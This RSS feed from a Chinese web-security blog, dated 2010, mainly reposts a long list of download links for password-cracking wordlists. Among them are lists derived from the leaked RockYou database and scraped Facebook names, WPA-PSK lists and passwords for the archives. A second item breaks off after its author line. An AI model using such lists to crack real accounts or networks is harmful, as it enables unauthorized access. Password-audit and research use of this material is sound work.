<?xml version="1.0" encoding="utf-8"?><?xml-stylesheet href='http://feed.pcsec.org/styles/temp01.xsl' type='text/xsl' ?><!--这是一个由Feedsy提供技术支持的Feed，为了提高读者阅读的体验，以及满足用户美化自己Feed的需要，我们设计了多种精美的Feed模板，提供给大家选择，所有最终呈现出来的样式，皆由用户自愿选择使用，未经许可，任何团体和个人，请不要擅自修改样式或者盗用，这是对于用户选择权的尊重。--><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:fs="http://www.feedsky.com/namespace/feed" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:dc="http://purl.org/dc/elements/1.1/" version="2.0"><channel><atom:link href="http://feed.pcsec.org" type="application/rss+xml" rel="self"></atom:link><fs:self_link href="http://feed.feedsky.com/pcsec" type="application/rss+xml"></fs:self_link><lastBuildDate>Tue, 31 Aug 2010 04:55:47 GMT</lastBuildDate><title>Web安全手册</title><description>关注Web安全</description><image><url>http://www.feedsky.com/feed/pcsec/sc/gif</url><title>Web安全手册</title><link>http://www.pcsec.org/</link></image><link>http://www.pcsec.org/</link><language>zh-CN</language><copyright>Copyright 2008-2009 Pcsec.org. Some Rights Reserved.苏ICP备08110306号var gaJsHost = ((&amp;quot;https:&amp;quot; == document.location.protocol) ? &amp;quot;https://ssl.&amp;quot; : &amp;quot;http://www.&amp;quot;);document.write(unescape(&amp;quot;%3Cscript src='&amp;quot; + gaJsHost + &amp;quot;google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E&amp;quot;));try {var pageTracker = _gat._getTracker(&amp;quot;UA-8775049-1&amp;quot;);pageTracker._trackPageview();} catch(err) {}</copyright><pubDate>Thu, 02 Sep 2010 08:52:08 GMT</pubDate><item><title>Compilation of wordlist downloads</title><link>http://item.feedsky.com/~feedsky/pcsec/~8218154/408683329/5281982/1/item.html</link><wfw:comment>http://www.pcsec.org/</wfw:comment><wfw:commentRss>http://www.pcsec.org/feed.asp?cmt=518</wfw:commentRss><trackback:ping>http://www.pcsec.org/cmd.asp?act=tb&amp;id=518&amp;key=1147b72c</trackback:ping><description>&lt;div class=&quot;storycontent&quot;&gt;&lt;p&gt;Original Source: &lt;a href=&quot;http://www.whatsmypass.com/compilation-of-wordlist-downloads&quot; target=&quot;_blank&quot;&gt;http://www.whatsmypass.com/compilation-of-wordlist-downloads&lt;br /&gt;&lt;/a&gt;Props to &lt;a href=&quot;http://hashcrack.blogspot.com/p/wordlist-downloads.html&quot;&gt;hashcrack.blogspot.com&lt;/a&gt;  for compiling the most comprehensive wordlist downloads on the web.  Copying links here just in case blogspot ever blows up.  Additionally  head over to &lt;a href=&quot;http://skullsecurity.org/wiki/index.php/Passwords&quot;&gt;skullsecurity.org&lt;/a&gt;  they have some specialized wordlists from various sources including the  hacked RockYou database and a skim of Facebook names/usernames for a  total of 14,488,929 distinct passwords to be exact, collected from  32,943,045 users.&lt;/p&gt;&lt;p&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://hashkiller.com/files/downloads/wordlists/&quot;&gt;HashKiller&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.insidepro.com/eng/download.shtml&quot;&gt;InsidePro&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.apasscracker.com/dictionaries/&quot;&gt;APassCracker&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://ftp.se.kde.org/pub/security/tools/net/Openwall/wordlists/&quot;&gt;Openwall&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;ftp://ftp.ox.ac.uk/pub/wordlists/&quot;&gt;ftp.ox.ac.uk&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://gdataonline.com/downloads/GDict/&quot;&gt;GDataOnline&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;ftp://ftp.cerias.purdue.edu/pub/dict/&quot;&gt;Cerias.Purdue&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.outpost9.com/files/WordLists.html&quot;&gt;Outpost9&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.vulnerabilityassessment.co.uk/passwords.zip&quot;&gt;VulnerabilityAssessment&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://packetstormsecurity.org/Crackers/wordlists/&quot;&gt;PacketStormSecurity&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.ai.uga.edu/ftplib/natural-language/moby/&quot;&gt;ai.uga.edu-moby&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.cotse.com/tools/wordlists1.htm&quot;&gt;cotse1&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.cotse.com/tools/wordlists2.htm&quot;&gt;cotse2&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://http//vxchaos.official.ws/Wordlists%20and%20Wordlist%20Tools/&quot;&gt;VXChaos&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.hack3r.com/wordlists/wikipedia-wordlist-sraveau-20090325.txt.bz2&quot;&gt;Wikipedia-wordlist-Sraveau&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://downloads.sourceforge.net/cracklib/cracklib-words-20080507.gz&quot;&gt;CrackLib-words&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://downloads.skullsecurity.org/passwords/&quot;&gt;SkullSecurity&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/88229830/Wordlist.rar&quot;&gt;Rapidshare-Wordlist.rar&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rmccurdy.com/scripts/packetstorm_dic_john_1337.tar.gz&quot;&gt;Packetstorm_dic_john_1337&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.megaupload.com/?d=QTK6GI9K&quot;&gt;Megaupload-birthdates.rar&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.megaupload.com/?d=XV34VA9Z&quot;&gt;Megaupload-default-001.rar&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.megaupload.com/?d=L7LQSH5U&quot;&gt;Megaupload-BIG-WPA-LIST-1.rar&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.megaupload.com/?d=2P23UCLV&quot;&gt;Megaupload-BIG-WPA-LIST-2.rar&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.megaupload.com/?d=F6DEE204&quot;&gt;Megaupload-BIG-WPA-LIST-3.rar&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://btjunkie.org/torrent/WPA-PSK-WORDLIST-40-MB-rar/4486ea4332a397743d3c6d1901cdead75ea4fb6988b0&quot;&gt;WPA-PSK-WORDLIST-40-MB-rar&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.torrentreactor.net/torrents/2295589/WPA-PSK-WORDLIST-2-%28107-MB%29-rar&quot;&gt;WPA-PSK-WORDLIST-2-107-MB-rar&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://article7.org/wordlists/&quot;&gt;Article7&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/100655354/Bender-ILLIST.rar.html&quot;&gt;Rapidshare-Bender-ILLIST&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://milw0rm.org/mil-dic.php&quot;&gt;Milw0rm&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.rohitab.com/discuss/index.php?s=fc0c2d65c4f55e204846775b49346668&amp;amp;app=core&amp;amp;module=attach&amp;amp;section=attach&amp;amp;attach_id=1235&quot;&gt;Rohitab&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://dualisanoob.com/tarballs/word_lists-20080618.tar.gz&quot;&gt;DualisaNoob&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://nomorecrypto.com/files/naxxatoe-dict-total-new-unsorted.torrent&quot;&gt;Naxxatoe-dict-total-new-unsorted&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://diablohorn.tbhost.eu/distribute/wordlists-sorted.gz.torrent&quot;&gt;DiabloHorn-wordlists-sorted&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://bright-shadows.net/download/downloads.php&quot;&gt;Bright-Shadows&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.mit.edu/%7Eecprice/wordlist.10000&quot;&gt;MIT.edu/~ecprice&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.neutronsite.com/WordList.txt&quot;&gt;NeutronSite&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://artofhacking.com/tucops/hack/password/&quot;&gt;ArtofHacking&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.cs.princeton.edu/introcs/data/&quot;&gt;CS.Princeton&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://spacebar.org/ifcd/wordlist.txt&quot;&gt;Spacebar&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://cd.textfiles.com/suzybatari2/wordwork/dicwords/wordlist.txt&quot;&gt;textfiles-suzybatari2&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://labs.mininova.org/wordmatch/wordlist.txt&quot;&gt;labs.mininova-wordmatch&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://bellsouthpwp.net/u/t/uttie/wordlist.txt&quot;&gt;BellSouthpwp&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.doz.org.uk/Science/wordlist.txt&quot;&gt;Doz.org.uk&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.ics.uci.edu/%7Ekay/wordlist.txt&quot;&gt;ics.uci.edu/~kay&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.inf.unideb.hu/%7Ejeszy/download/mestint/wordlist.txt&quot;&gt;inf.unideb.hu/~jeszy&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.opends.org/source/raw/trunk/opends/resource/config/wordlist.txt&quot;&gt;openDS&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.sslmit.unibo.it/%7Edsmiraglio/wordlist/&quot;&gt;sslmit.unibo.it/~dsmiraglio&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.informatik.uni-leipzig.de/%7Educ/software/misc/vn_words.zip&quot;&gt;informatik.uni-leipzig-vn_words.zip&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.cis.hut.fi/morphochallenge2007/data/&quot;&gt;cis.hut.fi&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://wordlist.sf.cz/&quot;&gt;Wordlist.sf.cz&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://john.cs.olemiss.edu/%7Esbs/download/cs517_NLP/wordlist/&quot;&gt;john.cs.olemiss.edu/~sbs&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://void.cyberpunk.ru/wordlist/&quot;&gt;Void.Cyberpunk&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://coyotecult.com/tools/files/wordlist.txt&quot;&gt;CoyoteCult&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://aima.eecs.berkeley.edu/data/wordlist/&quot;&gt;aima.eecs.berkeley.edu&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://andre.facadecomputer.com/ghost/wordlist.txt&quot;&gt;andre.facadecomputer&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://aurora.rg.iupui.edu/%7Eschadow/dbm-java/db-2.4.14/test/wordlist&quot;&gt;aurora.rg.iupui.edu/~schadow&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.cs.bilkent.edu.tr/%7Eccelik/cs111/WordList.txt&quot;&gt;cs.bilkent.edu.tr/~ccelik&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://broncgeeks.billings.k12.mt.us/vlong/php-projects/hangperson/wordlist.txt&quot;&gt;broncgeeks.billings.k12.mt.us/vlong&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.ihteam.net/tools/wordlist.rar&quot;&gt;IHTeam&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.leetupload.com/dbindex2/index.php?dir=Word%20Lists/&quot;&gt;Leetupload-Word Lists&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.offensive-security.com/wpa-tables/wpalist.txt.tar.bz2&quot;&gt;Offensive-Security WPA Rainbow Tables Password List&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://depositfiles.com/files/1z1ipsqi3&quot;&gt;depositfiles/1z1ipsqi3&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://home.btconnect.com/md5decrypter/passwords.zip&quot;&gt;MD5Decrypter/Passwords&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://depositfiles.com/files/qdcs7nv7x&quot;&gt;depositfiles/qdcs7nv7x&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;ftp://ftp.fu-berlin.de/misc/movies/database/&quot;&gt;ftp.fu-berlin.de&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rs363.rapidshare.com/files/88229830/Wordlist.rar&quot;&gt;Rapidshare.com/Wordlist.rar&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/397987217/Password.zip&quot;&gt;Rapidshare.com/Password.zip&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.megaupload.com/?d=V0X4Y9NE&quot;&gt;Megaupload/V0X4Y9NE&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.megaupload.com/?d=0UAUNNGT&quot;&gt;Megaupload/0UAUNNGT&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.megaupload.com/?d=1UA8QMCN&quot;&gt;Megaupload/1UA8QMCN&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://md5.hamaney.net/happybirthdaytoeq.txt&quot;&gt;md5.Hamaney/happybirthdaytoeq.txt&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://sites.google.com/site/reusablesec/Home/custom-wordlists&quot;&gt;sites.Google.com/ReusableSec&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.megaupload.com/?d=SNK18CU0&quot;&gt;Megaupload.com/SNK18CU0&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://hotfile.com/dl/20829813/d9f69a0/wordlists-20031009-iso.zip.html&quot;&gt;Hotfile.com/Wordlists-20031009-iso.zip&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/115095598/Wordlist_do_h4tinho.zip&quot;&gt;Rapidshare.com/Wordlist_do_h4tinho.zip&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/34291202/pass50.rar&quot;&gt;Rapidshare.com/pass50.rar&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://mirror.sweon.net/madchat/crypto/wordlists/&quot;&gt;sweon.net/wordlists&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.skullsecurity.org/blogdata/fbdata.torrent&quot;&gt;Skullsecurity.org/fbdata.torrent&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://leetupload.com/dbindex2/index.php?dir=Word%20Lists/&quot;&gt;Leetupload.com/WordLists&lt;/a&gt;&lt;br /&gt;Passwords: to0l-base, zmetex, mrdel2000&lt;/p&gt;&lt;p&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/116892703/BIG_PASSWORD_LIST.rar&quot;&gt;Rapidshare.com/BIG_PASSWORD_LIST.rar&lt;/a&gt;&lt;br /&gt;Pass:bodyslamer@warezshares.com&lt;/p&gt;&lt;p&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/305013757/dictionaries-vince213333.part01.rar&quot;&gt;Rapidshare.com/dictionaries-vince213333.part01.rar&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/305013804/dictionaries-vince213333.part02.rar&quot;&gt;Rapidshare.com/dictionaries-vince213333.part02.rar&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/305028222/dictionaries-vince213333.part03.rar&quot;&gt;Rapidshare.com/dictionaries-vince213333.part03.rar&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/115184148/Wordlist_Compilation.part1.rar&quot;&gt;Rapidshare.com/Wordlist_Compilation.part1.rar&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/115194497/Wordlist_Compilation.part2.rar&quot;&gt;Rapidshare.com/Wordlist_Compilation.part2.rar&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/115200483/Wordlist_Compilation.part3.rar&quot;&gt;Rapidshare.com/Wordlist_Compilation.part3.rar&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/115206562/Wordlist_Compilation.part4.rar&quot;&gt;Rapidshare.com/Wordlist_Compilation.part4.rar&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/165513464/word.lst.s.u.john.s.u.200.part01.rar&quot;&gt;Rapidshare.com-word.lst.s.u.john.s.u.200.part01.rar&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/165518143/word.lst.s.u.john.s.u.200.part02.rar&quot;&gt;Rapidshare.com-word.lst.s.u.john.s.u.200.part02.rar&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/165498510/word.lst.s.u.john.s.u.200.part03.rar&quot;&gt;Rapidshare.com-word.lst.s.u.john.s.u.200.part03.rar&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/90611743/purehates_word_list.part1.rar&quot;&gt;Rapidshare-Purehates_word_list.part1.rar&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/90620632/purehates_word_list.part2.rar&quot;&gt;Rapidshare-Purehates_word_list.part2.rar&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/90628318/purehates_word_list.part3.rar&quot;&gt;Rapidshare-Purehates_word_list.part3.rar&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/90636711/purehates_word_list.part4.rar&quot;&gt;Rapidshare-Purehates_word_list.part4.rar&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/90639703/purehates_word_list.part5.rar&quot;&gt;Rapidshare-Purehates_word_list.part5.rar&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/90571168/-_Xploitz_-_Master_Password_Collection.part1.rar&quot;&gt;Rapidshare-_Xploitz_-_Master_Password_Collection.part1.rar&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/90580220/-_Xploitz_-_Master_Password_Collection.part2.rar&quot;&gt;Rapidshare-_Xploitz_-_Master_Password_Collection.part2.rar&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/90584305/-_Xploitz_-_Master_Password_Collection.part3.rar&quot;&gt;Rapidshare-_Xploitz_-_Master_Password_Collection.part3.rar&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/90592992/-_Xploitz_-_Master_Password_Collection.part4.rar&quot;&gt;Rapidshare-_Xploitz_-_Master_Password_Collection.part4.rar&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/90598343/-_Xploitz_-_Master_Password_Collection.part5.rar&quot;&gt;Rapidshare-_Xploitz_-_Master_Password_Collection.part5.rarr&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/90603742/-_Xploitz_-_Master_Password_Collection.part6.rar&quot;&gt;Rapidshare-_Xploitz_-_Master_Password_Collection.part6.rarr&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/90605481/-_Xploitz_-_Master_Password_Collection.part7.rar&quot;&gt;Rapidshare-_Xploitz_-_Master_Password_Collection.part7.rar&lt;/a&gt;&lt;br /&gt;Pass: http://forums.remote-exploit.org/&lt;/p&gt;&lt;p&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/90652987/-_Xploitz_-_PASSWORD_DVD.part01.rar&quot;&gt;Rapidshare-_Xploitz_-_PASSWORD_DVD.part01.rar&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/90660770/-_Xploitz_-_PASSWORD_DVD.part02.rar&quot;&gt;Rapidshare-_Xploitz_-_PASSWORD_DVD.part02.rar&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/90673505/-_Xploitz_-_PASSWORD_DVD.part03.rar&quot;&gt;Rapidshare-_Xploitz_-_PASSWORD_DVD.part03.rar&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/90682244/-_Xploitz_-_PASSWORD_DVD.part04.rar&quot;&gt;Rapidshare-_Xploitz_-_PASSWORD_DVD.part04.rar&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/90691363/-_Xploitz_-_PASSWORD_DVD.part05.rar&quot;&gt;Rapidshare-_Xploitz_-_PASSWORD_DVD.part05.rar&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/90700044/-_Xploitz_-_PASSWORD_DVD.part06.rar&quot;&gt;Rapidshare-_Xploitz_-_PASSWORD_DVD.part06.rar&lt;/a&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/90702550/-_Xploitz_-_PASSWORD_DVD.part07.rar&quot;&gt;Rapidshare-_Xploitz_-_PASSWORD_DVD.part07.rar&lt;/a&gt;&lt;br /&gt;Pass: http://forums.remote-exploit.org/&lt;/p&gt;&lt;div style=&quot;overflow: hidden; color: rgb(0, 0, 0); background-color: transparent; text-align: left; text-decoration: none; border: medium none;&quot;&gt;Read more:  &lt;a href=&quot;http://hashcrack.blogspot.com/p/wordlist-downloads.html#ixzz0y95X1Q6Z&quot; style=&quot;color: rgb(0, 51, 153);&quot;&gt;http://hashcrack.blogspot.com/p/wordlist-downloads.html#ixzz0y95X1Q6Z&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://tcr130.tynt.com/ads/109/0y95X1Q6Z&quot; style=&quot;color: rgb(0, 51, 153);&quot;&gt;Hash Reversing, Wordlist and Rainbow Table Downloads&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Copyright © 2008&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;http://www.pcsec.org/archives/Compilation-of--wordlist--downloads.html&quot; target=&quot;_blank&quot;&gt;继续阅读《Compilation of wordlist downloads》的全文内容...&lt;/a&gt;&lt;/p&gt;&lt;p&gt;分类: &lt;a href=&quot;http://www.pcsec.org/archives/Download.html&quot;&gt;Download&lt;/a&gt; | Tags: &lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=wordlist&quot;&gt;wordlist&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=wordlists&quot;&gt;wordlists&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=Password&quot;&gt;Password&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=dictionary&quot;&gt;dictionary&lt;/a&gt;&amp;nbsp;&amp;nbsp; | &lt;a href=&quot;http://www.pcsec.org/archives/Compilation-of--wordlist--downloads.html#comment&quot; target=&quot;_blank&quot;&gt;添加评论&lt;/a&gt;(2)&lt;/p&gt;&lt;h3&gt;相关文章:&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;a href=&quot;http://www.pcsec.org/archives/fuzzdb-107.html&quot;&gt;fuzzdb 1.07&lt;/a&gt; (2010-4-30 1:10:26)  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.pcsec.org/archives/password-word-lists.html&quot;&gt;Password / Word lists&lt;/a&gt; (2009-9-20 13:5:59)  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.pcsec.org/archives/database-password-hashes-cracking.html&quot;&gt;Database Password Hashes Cracking&lt;/a&gt; (2009-4-6 16:20:56)  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.pcsec.org/archives/the-associative-word-list-generator-awlg-create-related-wordlists-for-password-cracking.html&quot;&gt;The Associative Word List Generator (AWLG) - Create Related Wordlists for Password Cracking&lt;/a&gt; (2009-1-16 20:35:41)  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.pcsec.org/archives/7.html&quot;&gt;Oracle Password Cracker&lt;/a&gt; (2008-10-1 21:55:25)  &lt;/li&gt;&lt;/ul&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/408683329/pcsec/feedsky/s.gif?r=http://item.feedsky.com/~feedsky/pcsec/~8218154/408683329/5281982/1/item.html&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/pcsec/408683329/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/pcsec/408683329/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</description><category>Download</category><pubDate>Tue, 31 Aug 2010 12:55:47 +0800</pubDate><author>root@pcsec.org (Trace)</author><comments>http://www.pcsec.org/archives/Compilation-of--wordlist--downloads.html#comment</comments><guid isPermaLink="false">http://www.pcsec.org/archives/Compilation-of--wordlist--downloads.html</guid><dc:creator>root@pcsec.org (Trace)</dc:creator><fs:srclink>http://www.pcsec.org/archives/Compilation-of--wordlist--downloads.html</fs:srclink><fs:srcfeed>http://pcsec.org/rss.xml</fs:srcfeed><fs:itemid>feedsky/pcsec/~8218154/408683329/5281982</fs:itemid></item><item><title>新版Any2Bat.vbs</title><link>http://item.feedsky.com/~feedsky/pcsec/~8218154/408683330/5281982/1/item.html</link><wfw:comment>http://www.pcsec.org/</wfw:comment><wfw:commentRss>http://www.pcsec.org/feed.asp?cmt=517</wfw:commentRss><trackback:ping>http://www.pcsec.org/cmd.asp?act=tb&amp;id=517&amp;key=e7a77266</trackback:ping><description>&lt;p&gt;&lt;font size=&quot;2&quot; face=&quot;宋体&quot;&gt;Author: &lt;a target=&quot;_blank&quot; href=&quot;http://hi.baidu.com/zzzevazzz/blog/item/bf58911c2fd9be8586d6b617.html&quot;&gt;zzzEVAzzz&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;&lt;p&gt;&lt;font size=&quot;2&quot; 